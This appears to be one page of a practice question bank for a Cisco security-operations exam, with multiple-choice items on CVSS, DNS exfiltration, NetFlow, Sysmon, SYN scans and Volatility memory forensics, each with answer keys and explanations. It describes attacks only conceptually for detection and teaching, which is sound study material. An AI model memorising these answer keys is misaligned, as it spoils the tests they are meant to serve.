Cisco often tests the misconception that disabling or lowering the severity of a false-positive signature is an acceptable quick fix, but the correct approach is to use custom rule exclusions to preserve detection for true positives.

How to eliminate wrong answers

Option A is wrong because lowering the severity to informational would suppress all alerts from that signature, effectively disabling its detection capability and reducing security posture, as the signature would no longer generate actionable alerts for true positives. Option B is wrong because disabling the IPS signature entirely removes its protection for all traffic, including potential true positives, which directly reduces security posture and is an overly aggressive response to false positives. Option D is wrong because updating the IPS signature database to the latest version does not resolve false positives caused by a signature that is too broadly matching legitimate traffic; the signature's behavior is defined by its rule logic, not by the database version, and updates typically add or modify signatures for new threats, not tune existing ones for false positives.

653
MCQmedium

A security analyst is reviewing a vulnerability scan report and sees a finding labeled 'CVE-2021-44228' with a CVSS score of 10.0. The analyst needs to prioritize remediation. Which factor does the CVSS score primarily represent?

A.The likelihood that the vulnerability will be exploited in the wild within the next 30 days
B.The amount of time required to patch the vulnerability
C.The severity of the vulnerability based on its technical impact and exploitability
D.The business impact of the vulnerability specific to the organization's assets
AnswerC

CVSS (Common Vulnerability Scoring System) provides a numerical score reflecting the severity of a vulnerability based on metrics such as attack vector, complexity, privileges required, and impact on confidentiality, integrity, and availability. A score of 10.0 indicates maximum severity. The scenario asks what the CVSS score primarily represents, and it is the severity based on technical impact and exploitability.

Why this answer

CVSS is a standardized framework for rating the severity of security vulnerabilities. The base score, such as 10.0, reflects intrinsic characteristics like exploitability and impact. It does not predict exploitation likelihood, business-specific impact, or remediation time.

Analysts use CVSS alongside other factors to prioritize remediation.

Exam trap

The trap here is assuming CVSS predicts real-world exploitation; it is a severity score, not a threat intelligence metric.

654
MCQmedium

An analyst suspects data exfiltration via DNS. Which log type would provide the most relevant information to confirm this?

A.Web server logs
B.Firewall logs
C.DNS logs
D.IDS/IPS alerts
AnswerC

DNS tunnelling encodes stolen data within query and response records, so DNS logs capture the queried names, record types, sizes and frequencies needed to spot anomalous exfiltration patterns. They directly satisfy the requirement to confirm data leaving via DNS.

Why this answer

DNS logs capture all DNS queries and responses, including the domain names being resolved. Data exfiltration via DNS often involves encoding stolen data into DNS queries (e.g., subdomains of a controlled domain). By examining DNS logs for unusual query patterns, high query volumes, or long, random-looking subdomains, an analyst can directly confirm exfiltration activity.

Exam trap

Cisco often tests the distinction between logs that record metadata (firewall logs) versus logs that record application-layer payloads (DNS logs), leading candidates to mistakenly choose firewall logs because they think 'all traffic passes through the firewall'.

How to eliminate wrong answers

Option A is wrong because web server logs record HTTP/HTTPS requests and responses, not DNS queries; they would miss exfiltration that uses DNS tunneling. Option B is wrong because firewall logs track allowed or denied network connections based on IP addresses and ports, but they do not log the content of DNS queries (the domain names themselves), making them insufficient for detecting DNS-based data exfiltration. Option D is wrong because IDS/IPS alerts are generated based on signatures or anomalies, but they may not capture the raw DNS query data needed to confirm exfiltration; they can raise alerts but do not provide the detailed query logs required for definitive analysis.

655
MCQeasy

A company uses Cisco Stealthwatch to monitor network traffic. Which type of data does Stealthwatch primarily rely on for visibility?

A.SNMP traps
B.Full packet captures
C.Syslog messages
D.NetFlow data
AnswerD

Stealthwatch ingests NetFlow records exported by routers and switches, using flow metadata such as source, destination, port and byte counts to build behavioural baselines and detect anomalies. This flow-based telemetry, not packet payloads, provides its primary network visibility.

Why this answer

Cisco Stealthwatch is designed for network traffic analysis and relies on NetFlow data (including IPFIX and other flow protocols) to provide visibility into network behavior, traffic patterns, and anomalies. Unlike full packet captures, NetFlow metadata (source/destination IP, ports, protocols, byte counts) is lightweight and scalable for monitoring large networks, making it the primary data source for Stealthwatch's behavioral analytics and threat detection.

Exam trap

Cisco often tests the distinction between flow-based monitoring (NetFlow) and packet-based monitoring (full packet capture), and the trap here is that candidates mistakenly think full packet captures are required for security monitoring, overlooking that Stealthwatch's efficiency and scalability come from using metadata-rich flow data instead.

How to eliminate wrong answers

Option A is wrong because SNMP traps are used for device status and fault management (e.g., interface up/down, CPU spikes), not for detailed traffic flow analysis that Stealthwatch requires. Option B is wrong because full packet captures provide deep packet inspection but are resource-intensive and not scalable for continuous monitoring across large networks; Stealthwatch uses flow data for efficiency. Option C is wrong because syslog messages are event logs from devices (e.g., authentication failures, configuration changes) and do not contain the traffic metadata (flows) needed for Stealthwatch's network visibility and anomaly detection.

656
MCQhard

An analyst is reviewing Sysmon logs from a compromised host. They see Event ID 1 (Process creation) for cmd.exe with parent process winword.exe. What does this indicate?

A.The Windows Update service initiated cmd from Word
B.The user launched cmd.exe manually from within Word using a shortcut
C.Word crashed and created a dump file using cmd
D.A macro in a Word document executed cmd.exe as part of the attack
AnswerD

winword.exe spawning cmd.exe indicates a malicious macro inside the Word document launched a command shell, a classic phishing payload technique. Legitimate Word usage does not normally create child cmd.exe processes, confirming code execution from the document.

Why this answer

Event ID 1 (Process creation) with parent process winword.exe spawning cmd.exe is a classic indicator of a macro-based attack. Microsoft Word is not designed to launch command-line interpreters under normal operation; when cmd.exe appears as a child of winword.exe, it strongly suggests that a malicious macro within the document executed a shell command, often to download payloads, escalate privileges, or perform reconnaissance. This aligns with common phishing and malware delivery techniques where attackers embed VBA macros to execute system commands.

Exam trap

Cisco often tests the distinction between normal application behavior and process injection or parent-child anomalies; the trap here is assuming that any cmd.exe launch is benign or user-initiated, when the parent process (winword.exe) is the key indicator of macro-based compromise.

How to eliminate wrong answers

Option A is wrong because Windows Update runs as a system service (svchost.exe or trustedinstaller.exe), not as a child of winword.exe; there is no mechanism for Windows Update to initiate cmd.exe from Word. Option B is wrong because manually launching cmd.exe from within Word via a shortcut would still show the parent process as explorer.exe or the user's shell, not winword.exe; Word does not become the parent process for user-initiated commands outside its own UI. Option C is wrong because Word crash dumps are typically created by Windows Error Reporting (WerFault.exe) or the process itself, not by spawning cmd.exe; a crash dump does not involve launching a command shell.

657
MCQhard

An analyst sees an alert for 'SQL injection' but the target is an internal application that only accepts POST requests with JSON data. The alert was triggered by a parameter in the URL. What is the most likely issue?

A.Application vulnerability
B.False positive due to mismatch
C.True positive SQL injection
D.Signature misconfiguration
AnswerB

The signature triggered on a non-relevant parameter.

Why this answer

The alert was triggered by a parameter in the URL, but the target application only accepts POST requests with JSON data. Since SQL injection via a URL parameter is impossible against an application that does not process URL parameters, the alert is a false positive caused by a mismatch between the signature's expected attack vector and the actual application behavior.

Exam trap

Cisco often tests the concept that a signature alert is not automatically a true positive—candidates must correlate the alert's trigger (e.g., URL parameter) with the application's actual input processing (e.g., only accepting JSON POST data) to identify a false positive due to vector mismatch.

How to eliminate wrong answers

Option A is wrong because the application only accepts POST requests with JSON data, so a URL parameter cannot be processed as an SQL injection vector; this indicates no actual vulnerability exists in that context. Option C is wrong because a true positive SQL injection would require the application to interpret the injected SQL in a query, but here the injection vector (URL parameter) is not used by the application, making exploitation impossible. Option D is wrong because signature misconfiguration would imply the signature is incorrectly tuned or enabled, but the issue is that the signature correctly detects a pattern in the URL parameter while the application ignores that parameter, so the signature is functioning as designed—the mismatch is between the alert and the application's behavior, not a signature configuration error.

658
MCQhard

Based on the exhibit, what is the most likely type of attack being observed?

A.ARP spoofing
B.DNS amplification attack
C.Port scan
D.SYN flood
AnswerD

A SYN flood sends numerous TCP SYN packets, often spoofed, without completing the three-way handshake, exhausting the target's half-open connection backlog. The exhibit's pattern of unanswered SYN requests with no completing ACKs matches this mechanism.

Why this answer

A SYN flood attack exploits the TCP three-way handshake by sending a high volume of SYN packets with spoofed source IP addresses, causing the target to allocate resources for half-open connections until it exhausts its backlog queue and denies legitimate traffic. The exhibit likely shows a massive spike in SYN packets without corresponding SYN-ACK or ACK completions, which is the hallmark of this attack.

Exam trap

Cisco often tests the distinction between a SYN flood (which targets the TCP handshake state table) and a port scan (which probes for open ports), so the trap here is that candidates see many SYN packets and assume it's a port scan rather than recognizing the volumetric nature of the attack.

How to eliminate wrong answers

Option A is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with the IP address of a legitimate host, which would not produce a flood of TCP SYN packets but rather ARP traffic. Option B is wrong because a DNS amplification attack uses small DNS queries with spoofed source IPs to generate large responses from open resolvers, resulting in high UDP traffic on port 53, not TCP SYN floods. Option C is wrong because a port scan typically sends a small number of packets (e.g., SYN, FIN, or NULL) to multiple ports to discover open services, not a massive volume of SYN packets to a single port that overwhelms the connection queue.

659
MCQeasy

An analyst wants to determine if a specific executable has been run on a Windows system. Which artifact provides evidence of prior execution?

A.Registry Run keys
B.Task Scheduler logs
C.Prefetch files
D.Windows Event Logs
AnswerC

Prefetch files record execution metadata for each program, storing the executable name, run count and last-run timestamps in C:\Windows\Prefetch. This directly satisfies the requirement to evidence prior execution on the Windows system, unlike artefacts that merely show presence or download.

Why this answer

Prefetch files (.pf) are created by Windows when an executable runs, storing execution details such as the first eight file paths referenced and the last run time. Analyzing Prefetch files allows an analyst to determine if a specific executable has been executed, even if the executable itself has been deleted. This makes Prefetch the most direct artifact for evidence of prior execution.

Exam trap

Cisco often tests the misconception that Windows Event Logs (specifically Security Event ID 4688) are always enabled and capture all process executions, when in reality they require explicit audit policy configuration and are often not logging by default, making Prefetch a more reliable artifact for execution evidence.

How to eliminate wrong answers

Option A is wrong because Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run) only indicate programs configured to start automatically at boot or user logon, not whether an arbitrary executable has been run. Option B is wrong because Task Scheduler logs record scheduled tasks and their execution history, but they do not capture execution of executables that were not scheduled. Option D is wrong because Windows Event Logs (e.g., Security log with Event ID 4688) can log process creation if auditing is enabled, but by default many systems do not log all process executions, making them unreliable for this specific forensic question.

660
MCQmedium

A company's security policy requires that all data classified as 'Confidential' must be encrypted at rest and in transit. This requirement is part of which policy?

A.Remote Access Policy
B.Password Policy
C.Data Classification Policy
D.Acceptable Use Policy
AnswerC

A Data Classification Policy defines the sensitivity tiers and mandates the handling controls each tier requires, including encryption at rest and in transit for 'Confidential' data. It is the governing document that translates classification labels into enforceable protection requirements, satisfying the stem's demand that classified data carry specific encryption obligations.

Why this answer

The requirement to encrypt 'Confidential' data is a direct outcome of a data classification policy, which defines categories (e.g., Public, Internal, Confidential, Restricted) and mandates specific security controls for each category. Encryption at rest and in transit is a typical control for the 'Confidential' tier, ensuring data is protected using mechanisms like AES-256 for storage and TLS 1.2+ for transmission.

Exam trap

Cisco often tests the distinction between a policy that defines data sensitivity levels (data classification) and a policy that implements access controls (remote access), leading candidates to confuse the encryption requirement with the method of access.

How to eliminate wrong answers

Option A is wrong because a remote access policy governs how users connect from external networks (e.g., VPN protocols, multi-factor authentication), not the classification-based encryption requirements for data. Option B is wrong because a password policy defines rules for password creation, complexity, and expiration (e.g., minimum length, special characters), not encryption of data based on sensitivity. Option D is wrong because an acceptable use policy outlines permitted and prohibited behaviors for company resources (e.g., browsing restrictions, software installation), not data encryption mandates tied to classification labels.

661
MCQhard

During a security assessment, an analyst uses the Shodan search engine to find exposed industrial control systems. Which phase of the attack lifecycle does this activity represent?

A.Command and control
B.Reconnaissance
C.Delivery
D.Exploitation
AnswerB

Shodan passively indexes internet-facing devices, letting the analyst gather intelligence on exposed industrial control systems without directly interacting with them. This satisfies the reconnaissance phase, where adversaries collect target information before exploitation, mapping to the Cyber Kill Chain's first stage and the MITRE ATT&CK discovery tactic.

Why this answer

Using Shodan to search for exposed industrial control systems is a form of passive/active information gathering about the target's internet-facing assets — this is the Reconnaissance phase of the attack lifecycle (also called footprinting or information gathering). The attacker is mapping the attack surface before any exploitation, delivery, or command-and-control activity occurs. Shodan indexes banners from internet-connected devices, making it a classic reconnaissance tool.

Exam trap

The trap is confusing reconnaissance with exploitation because Shodan 'finds vulnerable systems' — candidates assume finding equals exploiting, but Shodan performs no exploitation; it only indexes publicly available banner data, which is pure reconnaissance.

How to eliminate wrong answers

Option A is wrong because Command and Control (C2) refers to the post-compromise channel an attacker uses to communicate with implanted malware — no compromise has occurred during Shodan searching. Option C is wrong because Delivery is the phase where the weaponized payload is transmitted to the victim (e.g., phishing email, malicious USB) — Shodan does not deliver anything. Option D is wrong because Exploitation is the phase where a vulnerability is actually triggered to gain code execution — Shodan only identifies potentially vulnerable systems, it does not exploit them.

662
MCQmedium

A SOC analyst is investigating a suspected data exfiltration. The analyst needs to preserve evidence from a compromised workstation. Which of the following is the CORRECT procedure to ensure evidence integrity?

A.Use a write-blocker, compute hash of original disk, create image, compute hash of image, and compare hashes.
B.Create a forensic image without write-blocking, then hash the image.
C.Copy all files to an external drive without hashing.
D.Disconnect the hard drive and boot from a live CD to collect data.
AnswerA

A write-blocker prevents modification of the source disk during acquisition, and hashing before and after imaging proves the copy is bit-for-bit identical. Comparing the two hashes verifies integrity, satisfying the requirement to preserve admissible evidence from the compromised workstation.

Why this answer

Proper evidence preservation requires hashing the original disk before imaging and then hashing the image to verify integrity.

663
Multi-Selectmedium

A security analyst is reviewing the cryptographic mechanisms used to protect data in transit and at rest. The organization wants to ensure confidentiality and integrity for sensitive files stored on a server and for data sent over a VPN. Which TWO of the following mechanisms provide both confidentiality and integrity for data? (Choose two.)

Select 2 answers
A.HMAC-SHA256
B.SHA-256 hashing
C.AES-256 in CBC mode with HMAC-SHA256
D.AES-256 in GCM mode
E.RSA-2048 encryption
AnswersC, D

AES-256 in CBC mode provides confidentiality by encrypting data, and combining it with HMAC-SHA256 provides integrity and authenticity through a keyed hash. This combination is a common approach in protocols like IPsec and TLS. Together they ensure both confidentiality and integrity for data in transit and at rest, satisfying the organization's requirements.

Why this answer

AES-256 in GCM mode and AES-256 in CBC mode combined with HMAC-SHA256 both provide confidentiality and integrity. GCM is an authenticated encryption mode that includes an integrity tag, while CBC with HMAC uses separate encryption and authentication. SHA-256 and HMAC-SHA256 alone lack confidentiality, and RSA-2048 encryption alone lacks inherent integrity.

Exam trap

The trap here is assuming that any strong cryptographic algorithm provides both confidentiality and integrity, when hashing and HMAC provide only integrity and encryption alone provides only confidentiality.

664
Multi-Selectmedium

An incident response plan includes steps to contain a ransomware outbreak. Which TWO actions are typically performed during the containment phase? (Select two.)

Select 2 answers
A.Notify law enforcement
B.Identify the initial infection vector
C.Restore data from backups
D.Disconnect infected systems from the network
E.Quarantine the malware samples
AnswersD, E

Disconnecting infected systems from the network stops ransomware from spreading laterally to other hosts and shares, isolating the compromise while evidence is preserved. This is a classic containment action, distinct from eradication or recovery steps that follow once spread is halted.

Why this answer

Option D is correct because disconnecting infected systems from the network is a classic containment action that stops lateral movement and prevents the ransomware from spreading to additional hosts or shared resources. Option E is correct because quarantining malware samples isolates the malicious binaries in a controlled location so they cannot execute further while preserving them for forensic analysis and eradication planning. Option A is not a containment action; notifying law enforcement is typically an external communication or reporting step that occurs alongside or after containment.

Option B is incorrect because identifying the initial infection vector is part of the investigation or root-cause analysis phase, not containment. Option C is incorrect because restoring data from backups is a recovery-phase activity performed after the threat has been contained and eradicated.

Exam trap

The trap here is confusing containment with eradication, recovery, or post-incident activities — candidates often pick 'restore from backups' or 'notify law enforcement' because those sound urgent, but they belong to later phases.

665
MCQmedium

A security analyst is reviewing a Windows 10 host for potential compromise. The analyst runs 'net user' and sees an account named 'Support' that was not created by IT. The account is a member of the local Administrators group. Which Windows Event ID should the analyst check to determine when this account was created?

A.4722
B.4724
C.4720
D.4732
AnswerC

Event ID 4720 is logged when a user account is created. It includes the account name, the creator's username, and a timestamp. In this scenario, the analyst needs to determine when the suspicious 'Support' account was created, so 4720 is the correct event to look for. Reviewing this event can help identify the timeframe of the compromise and the account that created it, aiding further investigation.

Why this answer

The analyst needs to determine when the unauthorized 'Support' account was created. Event ID 4720 is specifically logged when a user account is created, providing the account name, creator, and timestamp. Other events like 4722 (enabled), 4724 (password reset), and 4732 (added to group) do not indicate creation time.

Therefore, 4720 is the correct event to review for account creation.

Exam trap

The trap here is confusing account creation with account enabling or group addition, which are logged under different Event IDs and do not provide the creation timestamp.

666
MCQmedium

During a SYN scan, an attacker sends a SYN packet to a closed port on a target. What response does the target typically send back?

A.ICMP Port Unreachable
B.RST
C.ACK
D.SYN-ACK
AnswerB

A closed port has no listener, so the target's TCP stack replies to the SYN with a RST packet, immediately refusing the connection. An open port would answer SYN-ACK instead. This RST-versus-SYN-ACK difference is exactly what lets a SYN scan distinguish open from closed ports.

Why this answer

In a SYN scan, a closed port responds with a RST packet to reject the connection attempt.

667
MCQmedium

A SOC analyst is reviewing NetFlow records and notices that a single internal host has initiated connections to 1,024 distinct destination IP addresses on TCP port 445 within a five-minute window. Each connection attempt lasts under one second and transfers fewer than three packets. Which activity does this pattern most strongly indicate?

A.SMB worm propagation scanning the local subnet and adjacent ranges
B.An SMB client resolving a hostname through repeated broadcast name queries
C.A legitimate backup application performing parallel SMB writes to storage nodes
D.A normal NetFlow sampling artifact caused by flow timeout settings
AnswerA

The short-lived, low-packet-count connections to many hosts on TCP 445 in a compressed timeframe match worm-style SMB scanning, where malware enumerates targets looking for writable shares or vulnerable services before moving laterally. A benign file server or backup job would not touch over a thousand distinct hosts in five minutes, and the uniform port reinforces automated propagation rather than user-driven access.

Why this answer

Rapid connections from one internal host to a large number of unique destinations on a single service port, each lasting only a moment and exchanging minimal data, is the signature of automated SMB scanning used for worm propagation. Legitimate SMB workloads target a small, stable set of servers and move meaningful data. NetFlow aggregation does not create destination diversity, and name resolution uses different ports and protocols, so the fan-out reflects real scanning behavior.

Exam trap

The trap here is assuming any burst of SMB traffic is normal file-sharing activity, when the decisive clue is the count of distinct destination hosts rather than the protocol itself.

668
MCQmedium

A hospital's IT department issues a document that tells administrators the exact sequence of steps to disable a terminated clinician's account, including which systems to check and in what order. The document is mandatory and is referenced during audits. Which type of security documentation does this describe?

A.Security standard
B.Security policy
C.Security guideline
D.Security procedure
AnswerD

A procedure is a detailed, mandatory, step-by-step document describing how to perform a specific task, exactly matching the account deprovisioning instructions. Procedures are operational, reference specific systems, and are commonly used during audits to demonstrate consistent execution. Because the document dictates the exact sequence of actions and is mandatory, it is correctly classified as a security procedure.

Why this answer

A security procedure is the mandatory, detailed, step-by-step documentation that describes how to carry out a specific operational task, such as disabling a terminated user's account across multiple systems in a defined order. Policies state intent, standards define mandatory requirements, and guidelines offer optional advice. The scenario's emphasis on an exact sequence of steps makes the procedure the correct classification.

Exam trap

The trap here is equating any mandatory document with a policy or standard, when the defining characteristic of a procedure is its detailed, sequential instructions for performing a specific task.

669
Multi-Selecteasy

Which TWO of the following are examples of Indicators of Compromise (IoCs) used in network security monitoring? (Choose two.)

Select 2 answers
A.MD5 hash of a malicious executable
B.IP addresses of known command and control servers
C.The current time of day
D.The company's stock price
E.The number of employees in the company
AnswersA, B

An MD5 hash uniquely identifies a known malicious file, so matching it against endpoint or network telemetry flags that exact executable without ambiguity. This satisfies the stem's requirement for a concrete, observable artefact left behind by an intrusion, unlike behavioural baselines or policy configurations, which describe normal states rather than evidence of compromise.

Why this answer

Option A is correct because an MD5 hash of a malicious executable is a classic host-based/file-based IoC: the cryptographic digest uniquely identifies known malware and can be matched against threat-intelligence feeds or SIEM/file-integrity rules. Option B is correct because IP addresses of known command-and-control (C2) servers are network-based IoCs that can be detected via firewall logs, IDS/IPS signatures, or NetFlow analysis of outbound connections. Option C is not an IoC, since the time of day is merely contextual metadata and not an artifact indicating compromise.

Option D is not an IoC, as a company's stock price has no bearing on security telemetry. Option E is not an IoC, because employee headcount is an organizational metric, not evidence of malicious activity.

Exam trap

Cisco often tests the distinction between IoCs (specific, actionable artifacts of compromise) and unrelated contextual data (like time, stock price, or employee count) to see if candidates understand that IoCs must directly indicate malicious activity, not just general system or business information.

670
Multi-Selecthard

Which two actions should an analyst take when a security monitoring tool generates a high number of false positives for a specific signature? (Choose two.)

Select 2 answers
A.Create a whitelist for known benign traffic.
B.Tune the signature parameters (e.g., threshold).
C.Increase the sensitivity of the signature.
D.Escalate to management without analysis.
E.Immediately disable the signature.
AnswersA, B

Whitelisting exempts known good traffic from triggering the signature.

Why this answer

Creating a whitelist for known benign traffic allows the analyst to suppress alerts for traffic that is confirmed safe, reducing false positives without losing visibility into actual threats. This approach leverages the security monitoring tool's ability to filter based on source/destination IPs, ports, or application signatures, ensuring that only truly malicious traffic triggers the signature.

Exam trap

Cisco often tests the misconception that disabling a signature or increasing sensitivity is a valid first step for handling false positives, but the correct response is always to tune or whitelist to preserve detection capability.

671
Multi-Selectmedium

Which TWO actions are appropriate when analyzing network traffic to identify a potential data exfiltration attempt?

Select 2 answers
A.Look for connections to known malicious IP addresses or domains.
B.Clear the network logs to ensure accurate analysis.
C.Focus exclusively on inbound traffic from external sources.
D.Immediately block all outbound traffic from the suspect host.
E.Identify unusually large outbound data transfers to external hosts.
AnswersA, E

Exfiltration traffic must reach an external destination, so matching outbound connections against threat-intelligence lists of malicious IP addresses and domains exposes command-and-control or drop servers. This indicator-based check is practical because the destination is the one element an attacker cannot easily conceal.

Why this answer

Option A is correct because correlating observed connections against threat-intelligence lists of known malicious IP addresses and domains is a standard way to flag command-and-control or exfiltration endpoints during traffic analysis. Option E is correct because data exfiltration typically manifests as anomalously large outbound transfers (high byte counts, long-duration sessions, or off-hours uploads) to external hosts, making volume and destination analysis essential. Option B is wrong because clearing network logs destroys the very evidence needed for analysis and violates forensic preservation principles.

Option C is wrong because exfiltration is outbound by nature, so focusing exclusively on inbound traffic would miss the activity being investigated. Option D is wrong because immediately blocking all outbound traffic from the suspect host is a containment/remediation action, not an analysis step, and it can tip off the attacker or disrupt evidence collection.

Exam trap

Cisco often tests the distinction between inbound and outbound traffic analysis, trapping candidates who forget that data exfiltration is an outbound activity, not an inbound one.

672
MCQeasy

An analyst needs to check for services that were set to start automatically on a Windows host. Which command-line utility can be used to query the state and start type of all services?

A.sc query
B.tasklist
C.schtasks
D.netstat
AnswerA

Correct. sc query lists service status and configuration.

Why this answer

The 'sc query' command retrieves information about services, including their state and start type (auto, manual, disabled). It is useful for identifying suspicious services.

673
MCQhard

An analyst examining a Linux server notices an unusual cron job in /etc/crontab that runs a script every 5 minutes. Which of the following describes the best approach to determine if this cron job is malicious?

A.Ignore it because cron jobs are always legitimate.
B.Delete the cron job immediately to stop potential malicious activity.
C.Check the script's content, owner, and compare its hash with known threats.
D.Run the script in a sandbox to see what it does.
AnswerC

Inspecting the script's content, owner and hash directly addresses the persistence mechanism: cron executes the referenced file, so its code, permissions and provenance reveal intent. Comparing the hash against threat intelligence confirms known malware, satisfying the need to determine whether this scheduled job is malicious rather than merely unusual.

Why this answer

Inspecting the script content and correlating with known persistence techniques helps assess maliciousness.

674
Multi-Selecteasy

A network analyst is creating a baseline for normal network traffic. Which TWO metrics should be included to establish a baseline?

Select 2 answers
A.Average bandwidth usage over time
B.Excessive connection attempts from a single IP
C.Peak traffic times
D.Typical protocol distribution (e.g., HTTP vs DNS)
E.Unusual payload sizes
AnswersA, D

Average bandwidth usage over time establishes the quantitative normal for link utilisation, so deviations such as spikes or sustained increases become detectable. This metric underpins anomaly-based monitoring, satisfying the baseline requirement for measurable traffic volume.

Why this answer

Option A (Average bandwidth usage over time) is correct because a traffic baseline must capture the normal volume of data traversing the network, and averaging utilization over representative periods establishes the expected throughput level against which anomalies can be measured. Option D (Typical protocol distribution, e.g., HTTP vs DNS) is correct because a baseline should document which protocols normally appear and in what proportions, so deviations such as unexpected SMB, IRC, or DNS tunneling traffic become detectable. Options B (Excessive connection attempts from a single IP) and E (Unusual payload sizes) describe anomalies or attack indicators rather than normal-behavior metrics, so they are things a baseline helps you identify, not components used to define the baseline itself.

Option C (Peak traffic times) is a useful contextual detail but is not one of the two core metrics for establishing a normal-traffic baseline in this scenario.

Exam trap

The trap here is confusing anomaly indicators (excessive connection attempts, unusual payload sizes) with baseline metrics — the exam expects you to recognize that baselines describe normal behavior, while anomalies are deviations from it.

675
MCQmedium

An analyst is performing memory forensics on a Windows machine using Volatility. Which command would be most useful to identify hidden or injected code within a process?

A.dlllist
B.netscan
C.pslist
D.malfind
AnswerD

The malfind plugin scans process memory for pages exhibiting characteristics of injected or hidden code, such as executable regions lacking a corresponding mapped file on disk. That directly addresses the requirement to identify injected code within a process during Windows memory forensics.

Why this answer

The `malfind` plugin in Volatility is specifically designed to detect hidden or injected code in process memory. It scans for memory regions that are both executable and writable (or have no file backing on disk), which are common indicators of code injection techniques like process hollowing or reflective DLL injection. By identifying these suspicious memory pages, `malfind` helps analysts uncover malware that attempts to hide within legitimate processes.

Exam trap

The trap here is confusing memory analysis plugins: candidates might think `dlllist` or `pslist` can reveal hidden code, but only `malfind` specifically targets injected code by analyzing memory permissions and file backing.

How to eliminate wrong answers

Option A is wrong because `dlllist` enumerates loaded DLLs for each process, which can reveal unexpected modules but does not directly detect injected code that may not appear as a standard DLL. Option B is wrong because `netscan` scans for network artifacts (open sockets, connections) and is unrelated to finding hidden code in memory. Option C is wrong because `pslist` simply lists active processes, which may show a malicious process but does not analyze memory for injected code within a process.

Page 8

Page 9 of 13

Page 10